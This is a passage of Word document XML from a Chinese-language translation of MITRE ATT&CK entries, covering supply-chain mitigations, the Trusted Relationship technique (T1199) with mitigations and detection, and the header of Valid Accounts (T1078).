      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00193DF3" w14:paraId="77DF9442" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C68CE22" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>软件更新</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8040" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB8B408" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>需要执行一个补丁管理流程来检查未使用的依赖项，未维护或者已经存在漏洞的依赖项，不必要的功能、组件、文件和文档。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00193DF3" w14:paraId="28A27134" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5747A3D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8040" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="726505F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>持续监控漏洞披露来源，并使用自动或手动的代码审查工具。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ADDB2A0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261AA30E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过哈希校验或者其他的完整性检查机制来验证获得的二进制文件。使用恶意软件特征库扫描下载的文件，并在正式部署前尝试测试软件或者更新，记录所有潜在的可疑行为。对硬件做物理检查以查找可能的篡改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE1E89" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可信</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>关系</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4AF49910" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58164E6D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1199</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ACB9193" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9C9669" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78430418" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>日志，认证日志，第三方应用日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E0117A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24A0D447" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FC7CFC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会破坏或利用能够接触到目标受害者的组织。通过受信任的第三方关系进行访问利用了现有连接，该连接可能不受保护或者比标准的网络访问机制受到的审查更少。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1953BD8B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组织通常授予第二方或第三方外部提供商更高的访问权限以便他们管理内部系统。例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IT</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务承包商、托管安全提供商、基础设施承包商（如暖通空调、电梯、物理安全）。第三方</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>提供商的访问可能仅限于维护中的基础设施，但可能与企业其他部分在同一网络上。所以，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击者可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>并使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部网络系统的有效访问账号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B49D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="13AABBC9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2C6CE732" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="68EE2913" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2B0B53D8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F2C77E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络分区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57DBEC76" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络分区来隔离不需要广泛网络访问的基础设施组件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3279442C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C9C4B4D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4301ADE7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>正确管理信任关系中各方使用的账号和权限，最大限度地减少各方的滥用行为，即便是</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>遭受了攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="713909DF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343CB190" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1774BD67" w14:textId="318586F8" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控第二方和第三方提供商以及其他可作为网络访问手段的受信任实体的活动。根据信任关系的类型，攻击者在执行操作之前可能会访问目标相关的大量信息，尤其是在信任关系基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IT</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的情况下。攻击者可能能够快速实现目标。因此，适当监控凭</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、横向移动以及收集相关的行为对于入侵检测非常重要。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492D4F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>有效账号</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3304D029" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4000B237" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1078</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C1C184" w14:textId="4C9EA4B8" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>逃逸，</w:t>
            </w:r>
            <w:r w:rsidR="00B438B1">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>，权限升级，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2529E77B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A21D58" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D4C93A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效权限：用户，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC87F73" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FCE3133" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防御：防火墙，主机入侵防御系统，网络入侵检测系统，进程白名单，系统访问控制，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="444243E0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="h5"/>
                </w:rPr>
                <w:t>CAPEC-560</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3D32B3C1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>Mark Wee</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>Praetorian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D26C29C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AB2878A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
